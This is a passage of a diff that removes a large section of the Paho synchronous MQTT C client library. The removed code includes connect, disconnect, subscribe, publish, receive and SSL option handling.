-	m->c->maxInflightMessages = (options->reliable) ? 1 : 10;
-
-	if (m->c->will)
-	{
-		free(m->c->will->payload);
-		free(m->c->will->topic);
-		free(m->c->will);
-		m->c->will = NULL;
-	}
-
-	if (options->will && (options->will->struct_version == 0 || options->will->struct_version == 1))
-	{
-		const void* source = NULL;
-
-		m->c->will = malloc(sizeof(willMessages));
-		if (options->will->message || (options->will->struct_version == 1 && options->will->payload.data))
-		{
-			if (options->will->struct_version == 1 && options->will->payload.data)
-			{
-				m->c->will->payloadlen = options->will->payload.len;
-				source = options->will->payload.data;
-			}
-			else
-			{
-				m->c->will->payloadlen = strlen(options->will->message);
-				source = (void*)options->will->message;
-			}
-			m->c->will->payload = malloc(m->c->will->payloadlen);
-			memcpy(m->c->will->payload, source, m->c->will->payloadlen);
-		}
-		else
-		{
-			m->c->will->payload = NULL;
-			m->c->will->payloadlen = 0;
-		}
-		m->c->will->qos = options->will->qos;
-		m->c->will->retained = options->will->retained;
-		m->c->will->topic = MQTTStrdup(options->will->topicName);
-	}
-
-#if defined(OPENSSL)
-	if (m->c->sslopts)
-	{
-		if (m->c->sslopts->trustStore)
-			free((void*)m->c->sslopts->trustStore);
-		if (m->c->sslopts->keyStore)
-			free((void*)m->c->sslopts->keyStore);
-		if (m->c->sslopts->privateKey)
-			free((void*)m->c->sslopts->privateKey);
-		if (m->c->sslopts->privateKeyPassword)
-			free((void*)m->c->sslopts->privateKeyPassword);
-		if (m->c->sslopts->enabledCipherSuites)
-			free((void*)m->c->sslopts->enabledCipherSuites);
-		free(m->c->sslopts);
-		m->c->sslopts = NULL;
-	}
-
-	if (options->struct_version != 0 && options->ssl)
-	{
-		m->c->sslopts = malloc(sizeof(MQTTClient_SSLOptions));
-		memset(m->c->sslopts, '\0', sizeof(MQTTClient_SSLOptions));
-		m->c->sslopts->struct_version = options->ssl->struct_version;
-		if (options->ssl->trustStore)
-			m->c->sslopts->trustStore = MQTTStrdup(options->ssl->trustStore);
-		if (options->ssl->keyStore)
-			m->c->sslopts->keyStore = MQTTStrdup(options->ssl->keyStore);
-		if (options->ssl->privateKey)
-			m->c->sslopts->privateKey = MQTTStrdup(options->ssl->privateKey);
-		if (options->ssl->privateKeyPassword)
-			m->c->sslopts->privateKeyPassword = MQTTStrdup(options->ssl->privateKeyPassword);
-		if (options->ssl->enabledCipherSuites)
-			m->c->sslopts->enabledCipherSuites = MQTTStrdup(options->ssl->enabledCipherSuites);
-		m->c->sslopts->enableServerCertAuth = options->ssl->enableServerCertAuth;
-		if (m->c->sslopts->struct_version >= 1)
-			m->c->sslopts->sslVersion = options->ssl->sslVersion;
-	}
-#endif
-
-	m->c->username = options->username;
-	m->c->password = options->password;
-	if (options->password)
-		m->c->passwordlen = strlen(options->password);
-	else if (options->struct_version >= 5 && options->binarypwd.data)
-	{
-		m->c->password = options->binarypwd.data;
-		m->c->passwordlen = options->binarypwd.len;
-	}
-	m->c->retryInterval = options->retryInterval;
-
-	if (options->struct_version >= 3)
-		MQTTVersion = options->MQTTVersion;
-	else
-		MQTTVersion = MQTTVERSION_DEFAULT;
-
-	if (MQTTVersion == MQTTVERSION_DEFAULT)
-	{
-		if ((rc = MQTTClient_connectURIVersion(handle, options, serverURI, 4, start, millisecsTimeout)) != MQTTCLIENT_SUCCESS)
-			rc = MQTTClient_connectURIVersion(handle, options, serverURI, 3, start, millisecsTimeout);
-	}
-	else
-		rc = MQTTClient_connectURIVersion(handle, options, serverURI, MQTTVersion, start, millisecsTimeout);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_connect(MQTTClient handle, MQTTClient_connectOptions* options)
-{
-	MQTTClients* m = handle;
-	int rc = SOCKET_ERROR;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(connect_mutex);
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (options == NULL)
-	{
-		rc = MQTTCLIENT_NULL_PARAMETER;
-		goto exit;
-	}
-
-	if (strncmp(options->struct_id, "MQTC", 4) != 0 || 	options->struct_version < 0 || options->struct_version > 5)
-	{
-		rc = MQTTCLIENT_BAD_STRUCTURE;
-		goto exit;
-	}
-
-	if (options->will) /* check validity of will options structure */
-	{
-		if (strncmp(options->will->struct_id, "MQTW", 4) != 0 || (options->will->struct_version != 0 && options->will->struct_version != 1))
-		{
-			rc = MQTTCLIENT_BAD_STRUCTURE;
-			goto exit;
-		}
-	}
-
-#if defined(OPENSSL)
-	if (options->struct_version != 0 && options->ssl) /* check validity of SSL options structure */
-	{
-		if (strncmp(options->ssl->struct_id, "MQTS", 4) != 0 || options->ssl->struct_version < 0 || options->ssl->struct_version > 1)
-		{
-			rc = MQTTCLIENT_BAD_STRUCTURE;
-			goto exit;
-		}
-	}
-#endif
-
-	if ((options->username && !UTF8_validateString(options->username)) ||
-		(options->password && !UTF8_validateString(options->password)))
-	{
-		rc = MQTTCLIENT_BAD_UTF8_STRING;
-		goto exit;
-	}
-
-	if (options->struct_version < 2 || options->serverURIcount == 0)
-		rc = MQTTClient_connectURI(handle, options, m->serverURI);
-	else
-	{
-		int i;
-
-		for (i = 0; i < options->serverURIcount; ++i)
-		{
-			char* serverURI = options->serverURIs[i];
-
-			if (strncmp(URI_TCP, serverURI, strlen(URI_TCP)) == 0)
-				serverURI += strlen(URI_TCP);
-#if defined(OPENSSL)
-			else if (strncmp(URI_SSL, serverURI, strlen(URI_SSL)) == 0)
-			{
-				serverURI += strlen(URI_SSL);
-				m->ssl = 1;
-			}
-#endif
-			if ((rc = MQTTClient_connectURI(handle, options, serverURI)) == MQTTCLIENT_SUCCESS)
-				break;
-		}
-	}
-
-exit:
-	if (m->c->will)
-	{
-		if (m->c->will->payload)
-			free(m->c->will->payload);
-		if (m->c->will->topic)
-			free(m->c->will->topic);
-		free(m->c->will);
-		m->c->will = NULL;
-	}
-	Thread_unlock_mutex(mqttclient_mutex);
-	Thread_unlock_mutex(connect_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * mqttclient_mutex must be locked when you call this function, if multi threaded
- */
-static int MQTTClient_disconnect1(MQTTClient handle, int timeout, int call_connection_lost, int stop)
-{
-	MQTTClients* m = handle;
-	START_TIME_TYPE start;
-	int rc = MQTTCLIENT_SUCCESS;
-	int was_connected = 0;
-
-	FUNC_ENTRY;
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0 && m->c->connect_state == 0)
-	{
-		rc = MQTTCLIENT_DISCONNECTED;
-		goto exit;
-	}
-	was_connected = m->c->connected; /* should be 1 */
-	if (m->c->connected != 0)
-	{
-		start = MQTTClient_start_clock();
-		m->c->connect_state = -2; /* indicate disconnecting */
-		while (m->c->inboundMsgs->count > 0 || m->c->outboundMsgs->count > 0)
-		{ /* wait for all inflight message flows to finish, up to timeout */
-			if (MQTTClient_elapsed(start) >= timeout)
-				break;
-			Thread_unlock_mutex(mqttclient_mutex);
-			MQTTClient_yield();
-			Thread_lock_mutex(mqttclient_mutex);
-		}
-	}
-
-	MQTTClient_closeSession(m->c);
-
-	while (Thread_check_sem(m->connect_sem))
-		Thread_wait_sem(m->connect_sem, 100);
-	while (Thread_check_sem(m->connack_sem))
-		Thread_wait_sem(m->connack_sem, 100);
-	while (Thread_check_sem(m->suback_sem))
-		Thread_wait_sem(m->suback_sem, 100);
-	while (Thread_check_sem(m->unsuback_sem))
-		Thread_wait_sem(m->unsuback_sem, 100);
-exit:
-	if (stop)
-		MQTTClient_stop();
-	if (call_connection_lost && m->cl && was_connected)
-	{
-		Log(TRACE_MIN, -1, "Calling connectionLost for client %s", m->c->clientID);
-		Thread_start(connectionLost_call, m);
-	}
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * mqttclient_mutex must be locked when you call this function, if multi threaded
- */
-static int MQTTClient_disconnect_internal(MQTTClient handle, int timeout)
-{
-	return MQTTClient_disconnect1(handle, timeout, 1, 1);
-}
-
-
-/**
- * mqttclient_mutex must be locked when you call this function, if multi threaded
- */
-void MQTTProtocol_closeSession(Clients* c, int sendwill)
-{
-	MQTTClient_disconnect_internal((MQTTClient)c->context, 0);
-}
-
-
-int MQTTClient_disconnect(MQTTClient handle, int timeout)
-{
-	int rc = 0;
-
-	Thread_lock_mutex(mqttclient_mutex);
-	rc = MQTTClient_disconnect1(handle, timeout, 0, 1);
-	Thread_unlock_mutex(mqttclient_mutex);
-	return rc;
-}
-
-
-int MQTTClient_isConnected(MQTTClient handle)
-{
-	MQTTClients* m = handle;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(mqttclient_mutex);
-	if (m && m->c)
-		rc = m->c->connected;
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_subscribeMany(MQTTClient handle, int count, char* const* topic, int* qos)
-{
-	MQTTClients* m = handle;
-	List* topics = NULL;
-	List* qoss = NULL;
-	int i = 0;
-	int rc = MQTTCLIENT_FAILURE;
-	int msgid = 0;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(subscribe_mutex);
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0)
-	{
-		rc = MQTTCLIENT_DISCONNECTED;
-		goto exit;
-	}
-	for (i = 0; i < count; i++)
-	{
-		if (!UTF8_validateString(topic[i]))
-		{
-			rc = MQTTCLIENT_BAD_UTF8_STRING;
-			goto exit;
-		}
-
-		if(qos[i] < 0 || qos[i] > 2)
-		{
-			rc = MQTTCLIENT_BAD_QOS;
-			goto exit;
-		}
-	}
-	if ((msgid = MQTTProtocol_assignMsgId(m->c)) == 0)
-	{
-		rc = MQTTCLIENT_MAX_MESSAGES_INFLIGHT;
-		goto exit;
-	}
-
-	topics = ListInitialize();
-	qoss = ListInitialize();
-	for (i = 0; i < count; i++)
-	{
-		ListAppend(topics, topic[i], strlen(topic[i]));
-		ListAppend(qoss, &qos[i], sizeof(int));
-	}
-
-	rc = MQTTProtocol_subscribe(m->c, topics, qoss, msgid);
-	ListFreeNoContent(topics);
-	ListFreeNoContent(qoss);
-
-	if (rc == TCPSOCKET_COMPLETE)
-	{
-		MQTTPacket* pack = NULL;
-
-		Thread_unlock_mutex(mqttclient_mutex);
-		pack = MQTTClient_waitfor(handle, SUBACK, &rc, 10000L);
-		Thread_lock_mutex(mqttclient_mutex);
-		if (pack != NULL)
-		{
-			Suback* sub = (Suback*)pack;
-			ListElement* current = NULL;
-			i = 0;
-			while (ListNextElement(sub->qoss, &current))
-			{
-				int* reqqos = (int*)(current->content);
-				qos[i++] = *reqqos;
-			}
-			rc = MQTTProtocol_handleSubacks(pack, m->c->net.socket);
-			m->pack = NULL;
-		}
-		else
-			rc = SOCKET_ERROR;
-	}
-
-	if (rc == SOCKET_ERROR)
-		MQTTClient_disconnect_internal(handle, 0);
-	else if (rc == TCPSOCKET_COMPLETE)
-		rc = MQTTCLIENT_SUCCESS;
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	Thread_unlock_mutex(subscribe_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_subscribe(MQTTClient handle, const char* topic, int qos)
-{
-	int rc = 0;
-	char *const topics[] = {(char*)topic};
-
-	FUNC_ENTRY;
-	rc = MQTTClient_subscribeMany(handle, 1, topics, &qos);
-	if (qos == MQTT_BAD_SUBSCRIBE) /* addition for MQTT 3.1.1 - error code from subscribe */
-		rc = MQTT_BAD_SUBSCRIBE;
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_unsubscribeMany(MQTTClient handle, int count, char* const* topic)
-{
-	MQTTClients* m = handle;
-	List* topics = NULL;
-	int i = 0;
-	int rc = SOCKET_ERROR;
-	int msgid = 0;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(unsubscribe_mutex);
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0)
-	{
-		rc = MQTTCLIENT_DISCONNECTED;
-		goto exit;
-	}
-	for (i = 0; i < count; i++)
-	{
-		if (!UTF8_validateString(topic[i]))
-		{
-			rc = MQTTCLIENT_BAD_UTF8_STRING;
-			goto exit;
-		}
-	}
-	if ((msgid = MQTTProtocol_assignMsgId(m->c)) == 0)
-	{
-		rc = MQTTCLIENT_MAX_MESSAGES_INFLIGHT;
-		goto exit;
-	}
-
-	topics = ListInitialize();
-	for (i = 0; i < count; i++)
-		ListAppend(topics, topic[i], strlen(topic[i]));
-	rc = MQTTProtocol_unsubscribe(m->c, topics, msgid);
-	ListFreeNoContent(topics);
-
-	if (rc == TCPSOCKET_COMPLETE)
-	{
-		MQTTPacket* pack = NULL;
-
-		Thread_unlock_mutex(mqttclient_mutex);
-		pack = MQTTClient_waitfor(handle, UNSUBACK, &rc, 10000L);
-		Thread_lock_mutex(mqttclient_mutex);
-		if (pack != NULL)
-		{
-			rc = MQTTProtocol_handleUnsubacks(pack, m->c->net.socket);
-			m->pack = NULL;
-		}
-		else
-			rc = SOCKET_ERROR;
-	}
-
-	if (rc == SOCKET_ERROR)
-		MQTTClient_disconnect_internal(handle, 0);
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	Thread_unlock_mutex(unsubscribe_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_unsubscribe(MQTTClient handle, const char* topic)
-{
-	int rc = 0;
-	char *const topics[] = {(char*)topic};
-	FUNC_ENTRY;
-	rc = MQTTClient_unsubscribeMany(handle, 1, topics);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_publish(MQTTClient handle, const char* topicName, int payloadlen, void* payload,
-							 int qos, int retained, MQTTClient_deliveryToken* deliveryToken)
-{
-	int rc = MQTTCLIENT_SUCCESS;
-	MQTTClients* m = handle;
-	Messages* msg = NULL;
-	Publish* p = NULL;
-	int blocked = 0;
-	int msgid = 0;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL || m->c == NULL)
-		rc = MQTTCLIENT_FAILURE;
-	else if (m->c->connected == 0)
-		rc = MQTTCLIENT_DISCONNECTED;
-	else if (!UTF8_validateString(topicName))
-		rc = MQTTCLIENT_BAD_UTF8_STRING;
-	if (rc != MQTTCLIENT_SUCCESS)
-		goto exit;
-
-	/* If outbound queue is full, block until it is not */
-	while (m->c->outboundMsgs->count >= m->c->maxInflightMessages ||
-         Socket_noPendingWrites(m->c->net.socket) == 0) /* wait until the socket is free of large packets being written */
-	{
-		if (blocked == 0)
-		{
-			blocked = 1;
-			Log(TRACE_MIN, -1, "Blocking publish on queue full for client %s", m->c->clientID);
-		}
-		Thread_unlock_mutex(mqttclient_mutex);
-		MQTTClient_yield();
-		Thread_lock_mutex(mqttclient_mutex);
-		if (m->c->connected == 0)
-		{
-			rc = MQTTCLIENT_FAILURE;
-			goto exit;
-		}
-	}
-	if (blocked == 1)
-		Log(TRACE_MIN, -1, "Resuming publish now queue not full for client %s", m->c->clientID);
-	if (qos > 0 && (msgid = MQTTProtocol_assignMsgId(m->c)) == 0)
-	{	/* this should never happen as we've waited for spaces in the queue */
-		rc = MQTTCLIENT_MAX_MESSAGES_INFLIGHT;
-		goto exit;
-	}
-
-	p = malloc(sizeof(Publish));
-
-	p->payload = payload;
-	p->payloadlen = payloadlen;
-	p->topic = (char*)topicName;
-	p->msgId = msgid;
-
-	rc = MQTTProtocol_startPublish(m->c, p, qos, retained, &msg);
-
-	/* If the packet was partially written to the socket, wait for it to complete.
-	 * However, if the client is disconnected during this time and qos is not 0, still return success, as
-	 * the packet has already been written to persistence and assigned a message id so will
-	 * be sent when the client next connects.
-	 */
-	if (rc == TCPSOCKET_INTERRUPTED)
-	{
-		while (m->c->connected == 1 && SocketBuffer_getWrite(m->c->net.socket))
-		{
-			Thread_unlock_mutex(mqttclient_mutex);
-			MQTTClient_yield();
-			Thread_lock_mutex(mqttclient_mutex);
-		}
-		rc = (qos > 0 || m->c->connected == 1) ? MQTTCLIENT_SUCCESS : MQTTCLIENT_FAILURE;
-	}
-
-	if (deliveryToken && qos > 0)
-		*deliveryToken = msg->msgid;
-
-	free(p);
-
-	if (rc == SOCKET_ERROR)
-	{
-		MQTTClient_disconnect_internal(handle, 0);
-		/* Return success for qos > 0 as the send will be retried automatically */
-		rc = (qos > 0) ? MQTTCLIENT_SUCCESS : MQTTCLIENT_FAILURE;
-	}
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-int MQTTClient_publishMessage(MQTTClient handle, const char* topicName, MQTTClient_message* message,
-															 MQTTClient_deliveryToken* deliveryToken)
-{
-	int rc = MQTTCLIENT_SUCCESS;
-
-	FUNC_ENTRY;
-	if (message == NULL)
-	{
-		rc = MQTTCLIENT_NULL_PARAMETER;
-		goto exit;
-	}
-
-	if (strncmp(message->struct_id, "MQTM", 4) != 0 || message->struct_version != 0)
-	{
-		rc = MQTTCLIENT_BAD_STRUCTURE;
-		goto exit;
-	}
-
-	rc = MQTTClient_publish(handle, topicName, message->payloadlen, message->payload,
-								message->qos, message->retained, deliveryToken);
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTClient_retry(void)
-{
-	static time_t last = 0L;
-	time_t now;
-
-	FUNC_ENTRY;
-	time(&(now));
-	if (difftime(now, last) > retryLoopInterval)
-	{
-		time(&(last));
-		MQTTProtocol_keepalive(now);
-		MQTTProtocol_retry(now, 1, 0);
-	}
-	else
-		MQTTProtocol_retry(now, 0, 0);
-	FUNC_EXIT;
-}
-
-
-static MQTTPacket* MQTTClient_cycle(int* sock, unsigned long timeout, int* rc)
-{
-	struct timeval tp = {0L, 0L};
-	static Ack ack;
-	MQTTPacket* pack = NULL;
-
-	FUNC_ENTRY;
-	if (timeout > 0L)
-	{
-		tp.tv_sec = timeout / 1000;
-		tp.tv_usec = (timeout % 1000) * 1000; /* this field is microseconds! */
-	}
-
-#if defined(OPENSSL)
-	if ((*sock = SSLSocket_getPendingRead()) == -1)
-	{
-		/* 0 from getReadySocket indicates no work to do, -1 == error, but can happen normally */
-#endif
-		Thread_lock_mutex(socket_mutex);
-		*sock = Socket_getReadySocket(0, &tp);
-		Thread_unlock_mutex(socket_mutex);
-#if defined(OPENSSL)
-	}
-#endif
-	Thread_lock_mutex(mqttclient_mutex);
-	if (*sock > 0)
-	{
-		MQTTClients* m = NULL;
-		if (ListFindItem(handles, sock, clientSockCompare) != NULL)
-			m = (MQTTClient)(handles->current->content);
-		if (m != NULL)
-		{
-			if (m->c->connect_state == 1 || m->c->connect_state == 2)
-				*rc = 0;  /* waiting for connect state to clear */
-			else
-			{
-				pack = MQTTPacket_Factory(&m->c->net, rc);
-				if (*rc == TCPSOCKET_INTERRUPTED)
-					*rc = 0;
-			}
-		}
-		if (pack)
-		{
-			int freed = 1;
-
-			/* Note that these handle... functions free the packet structure that they are dealing with */
-			if (pack->header.bits.type == PUBLISH)
-				*rc = MQTTProtocol_handlePublishes(pack, *sock);
-			else if (pack->header.bits.type == PUBACK || pack->header.bits.type == PUBCOMP)
-			{
-				int msgid;
-
-				ack = (pack->header.bits.type == PUBCOMP) ? *(Pubcomp*)pack : *(Puback*)pack;
-				msgid = ack.msgId;
-				*rc = (pack->header.bits.type == PUBCOMP) ?
-						MQTTProtocol_handlePubcomps(pack, *sock) : MQTTProtocol_handlePubacks(pack, *sock);
-				if (m && m->dc)
-				{
-					Log(TRACE_MIN, -1, "Calling deliveryComplete for client %s, msgid %d", m->c->clientID, msgid);
-					(*(m->dc))(m->context, msgid);
-				}
-			}
-			else if (pack->header.bits.type == PUBREC)
-				*rc = MQTTProtocol_handlePubrecs(pack, *sock);
-			else if (pack->header.bits.type == PUBREL)
-				*rc = MQTTProtocol_handlePubrels(pack, *sock);
-			else if (pack->header.bits.type == PINGRESP)
-				*rc = MQTTProtocol_handlePingresps(pack, *sock);
-			else
-				freed = 0;
-			if (freed)
-				pack = NULL;
-		}
-	}
-	MQTTClient_retry();
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(*rc);
-	return pack;
-}
-
-
-static MQTTPacket* MQTTClient_waitfor(MQTTClient handle, int packet_type, int* rc, long timeout)
-{
-	MQTTPacket* pack = NULL;
-	MQTTClients* m = handle;
-	START_TIME_TYPE start = MQTTClient_start_clock();
-
-	FUNC_ENTRY;
-	if (((MQTTClients*)handle) == NULL || timeout <= 0L)
-	{
-		*rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-
-	if (running)
-	{
-		if (packet_type == CONNECT)
-		{
-			if ((*rc = Thread_wait_sem(m->connect_sem, timeout)) == 0)
-				*rc = m->rc;
-		}
-		else if (packet_type == CONNACK)
-			*rc = Thread_wait_sem(m->connack_sem, timeout);
-		else if (packet_type == SUBACK)
-			*rc = Thread_wait_sem(m->suback_sem, timeout);
-		else if (packet_type == UNSUBACK)
-			*rc = Thread_wait_sem(m->unsuback_sem, timeout);
-		if (*rc == 0 && packet_type != CONNECT && m->pack == NULL)
-			Log(LOG_ERROR, -1, "waitfor unexpectedly is NULL for client %s, packet_type %d, timeout %ld", m->c->clientID, packet_type, timeout);
-		pack = m->pack;
-	}
-	else
-	{
-		*rc = TCPSOCKET_COMPLETE;
-		while (1)
-		{
-			int sock = -1;
-			pack = MQTTClient_cycle(&sock, 100L, rc);
-			if (sock == m->c->net.socket)
-			{
-				if (*rc == SOCKET_ERROR)
-					break;
-				if (pack && (pack->header.bits.type == packet_type))
-					break;
-				if (m->c->connect_state == 1)
-				{
-					int error;
-					socklen_t len = sizeof(error);
-
-					if ((*rc = getsockopt(m->c->net.socket, SOL_SOCKET, SO_ERROR, (char*)&error, &len)) == 0)
-						*rc = error;
-					break;
-				}
-#if defined(OPENSSL)
-				else if (m->c->connect_state == 2)
-				{
-					*rc = SSLSocket_connect(m->c->net.ssl, sock);
-					if (*rc == SSL_FATAL)
-						break;
-					else if (*rc == 1) /* rc == 1 means SSL connect has finished and succeeded */
-					{
-						if (!m->c->cleansession && m->c->session == NULL)
-							m->c->session = SSL_get1_session(m->c->net.ssl);
-						break;
-					}
-				}
-#endif
-				else if (m->c->connect_state == 3)
-				{
-					int error;
-					socklen_t len = sizeof(error);
-
-					if (getsockopt(m->c->net.socket, SOL_SOCKET, SO_ERROR, (char*)&error, &len) == 0)
-					{
-						if (error)
-						{
-							*rc = error;
-							break;
-						}
-					}
-				}
-			}
-			if (MQTTClient_elapsed(start) > timeout)
-			{
-				pack = NULL;
-				break;
-			}
-		}
-	}
-
-exit:
-	FUNC_EXIT_RC(*rc);
-	return pack;
-}
-
-
-int MQTTClient_receive(MQTTClient handle, char** topicName, int* topicLen, MQTTClient_message** message,
-											 unsigned long timeout)
-{
-	int rc = TCPSOCKET_COMPLETE;
-	START_TIME_TYPE start = MQTTClient_start_clock();
-	unsigned long elapsed = 0L;
-	MQTTClients* m = handle;
-
-	FUNC_ENTRY;
-	if (m == NULL || m->c == NULL
-			|| running) /* receive is not meant to be called in a multi-thread environment */
-	{
-		rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-	if (m->c->connected == 0)
-	{
-		rc = MQTTCLIENT_DISCONNECTED;
-		goto exit;
-	}
-
-	*topicName = NULL;
-	*message = NULL;
-
-	/* if there is already a message waiting, don't hang around but still do some packet handling */
-	if (m->c->messageQueue->count > 0)
-		timeout = 0L;
-
-	elapsed = MQTTClient_elapsed(start);
-	do
-	{
-		int sock = 0;
-		MQTTClient_cycle(&sock, (timeout > elapsed) ? timeout - elapsed : 0L, &rc);
-
-		if (rc == SOCKET_ERROR)
-		{
-			if (ListFindItem(handles, &sock, clientSockCompare) && 	/* find client corresponding to socket */
-			  (MQTTClient)(handles->current->content) == handle)
-				break; /* there was an error on the socket we are interested in */
-		}
-		elapsed = MQTTClient_elapsed(start);
-	}
-	while (elapsed < timeout && m->c->messageQueue->count == 0);
-
-	if (m->c->messageQueue->count > 0)
-		rc = MQTTClient_deliverMessage(rc, m, topicName, topicLen, message);
-
-	if (rc == SOCKET_ERROR)
-		MQTTClient_disconnect_internal(handle, 0);
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-void MQTTClient_yield(void)
-{
-	START_TIME_TYPE start = MQTTClient_start_clock();
-	unsigned long elapsed = 0L;
-	unsigned long timeout = 100L;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (running) /* yield is not meant to be called in a multi-thread environment */
-	{
-		MQTTClient_sleep(timeout);
-		goto exit;
-	}
-
-	elapsed = MQTTClient_elapsed(start);
-	do
-	{
-		int sock = -1;
-		MQTTClient_cycle(&sock, (timeout > elapsed) ? timeout - elapsed : 0L, &rc);
-		Thread_lock_mutex(mqttclient_mutex);
-		if (rc == SOCKET_ERROR && ListFindItem(handles, &sock, clientSockCompare))
-		{
-			MQTTClients* m = (MQTTClient)(handles->current->content);
-			if (m->c->connect_state != -2)
-				MQTTClient_disconnect_internal(m, 0);
-		}
-		Thread_unlock_mutex(mqttclient_mutex);
-		elapsed = MQTTClient_elapsed(start);
-	}
-	while (elapsed < timeout);
-exit:
-	FUNC_EXIT;
-}
-
-/*
-static int pubCompare(void* a, void* b)
-{
-	Messages* msg = (Messages*)a;
-	return msg->publish == (Publications*)b;
-}*/
-
-
-int MQTTClient_waitForCompletion(MQTTClient handle, MQTTClient_deliveryToken mdt, unsigned long timeout)
-{
-	int rc = MQTTCLIENT_FAILURE;
-	START_TIME_TYPE start = MQTTClient_start_clock();
-	unsigned long elapsed = 0L;
-	MQTTClients* m = handle;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL || m->c == NULL)
-	{
-		rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-
-	elapsed = MQTTClient_elapsed(start);
-	while (elapsed < timeout)
-	{
-		if (m->c->connected == 0)
-		{
-			rc = MQTTCLIENT_DISCONNECTED;
-			goto exit;
-		}
-		if (ListFindItem(m->c->outboundMsgs, &mdt, messageIDCompare) == NULL)
-		{
-			rc = MQTTCLIENT_SUCCESS; /* well we couldn't find it */
-			goto exit;
-		}
-		Thread_unlock_mutex(mqttclient_mutex);
-		MQTTClient_yield();
-		Thread_lock_mutex(mqttclient_mutex);
-		elapsed = MQTTClient_elapsed(start);
-	}
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTClient_getPendingDeliveryTokens(MQTTClient handle, MQTTClient_deliveryToken **tokens)
-{
-	int rc = MQTTCLIENT_SUCCESS;
-	MQTTClients* m = handle;
-	*tokens = NULL;
-
-	FUNC_ENTRY;
-	Thread_lock_mutex(mqttclient_mutex);
-
-	if (m == NULL)
-	{
-		rc = MQTTCLIENT_FAILURE;
-		goto exit;
-	}
-
-	if (m->c && m->c->outboundMsgs->count > 0)
-	{
-		ListElement* current = NULL;
-		int count = 0;
-
-		*tokens = malloc(sizeof(MQTTClient_deliveryToken) * (m->c->outboundMsgs->count + 1));
-		/*Heap_unlink(__FILE__, __LINE__, *tokens);*/
-		while (ListNextElement(m->c->outboundMsgs, &current))
-		{
-			Messages* m = (Messages*)(current->content);
-			(*tokens)[count++] = m->msgid;
-		}
-		(*tokens)[count] = -1;
-	}
-
-exit:
-	Thread_unlock_mutex(mqttclient_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-MQTTClient_nameValue* MQTTClient_getVersionInfo(void)
-{
-	#define MAX_INFO_STRINGS 8
-	static MQTTClient_nameValue libinfo[MAX_INFO_STRINGS + 1];
-	int i = 0;
-
-	libinfo[i].name = "Product name";
-	libinfo[i++].value = "Paho Synchronous MQTT C Client Library";
-
-	libinfo[i].name = "Version";
-	libinfo[i++].value = CLIENT_VERSION;
-
-	libinfo[i].name = "Build level";
-	libinfo[i++].value = BUILD_TIMESTAMP;
-#if defined(OPENSSL)
-	libinfo[i].name = "OpenSSL version";
-	libinfo[i++].value = SSLeay_version(SSLEAY_VERSION);
-
-	libinfo[i].name = "OpenSSL flags";
-	libinfo[i++].value = SSLeay_version(SSLEAY_CFLAGS);
-
-	libinfo[i].name = "OpenSSL build timestamp";
-	libinfo[i++].value = SSLeay_version(SSLEAY_BUILT_ON);
-
-	libinfo[i].name = "OpenSSL platform";
-	libinfo[i++].value = SSLeay_version(SSLEAY_PLATFORM);
-
-	libinfo[i].name = "OpenSSL directory";
-	libinfo[i++].value = SSLeay_version(SSLEAY_DIR);
-#endif
-	libinfo[i].name = NULL;
-	libinfo[i].value = NULL;
-	return libinfo;
-}
-
-
-/**
- * See if any pending writes have been completed, and cleanup if so.
- * Cleaning up means removing any publication data that was stored because the write did
- * not originally complete.
- */
-static void MQTTProtocol_checkPendingWrites(void)
-{
-	FUNC_ENTRY;
-	if (state.pending_writes.count > 0)
-	{
-		ListElement* le = state.pending_writes.first;
-		while (le)
-		{
-			if (Socket_noPendingWrites(((pending_write*)(le->content))->socket))
-			{
-				MQTTProtocol_removePublication(((pending_write*)(le->content))->p);
-				state.pending_writes.current = le;
-				ListRemove(&(state.pending_writes), le->content); /* does NextElement itself */
-				le = state.pending_writes.current;
-			}
-			else
-				ListNextElement(&(state.pending_writes), &le);
-		}
-	}
-	FUNC_EXIT;
-}
-
-
-static void MQTTClient_writeComplete(int socket)
-{
-	ListElement* found = NULL;
-
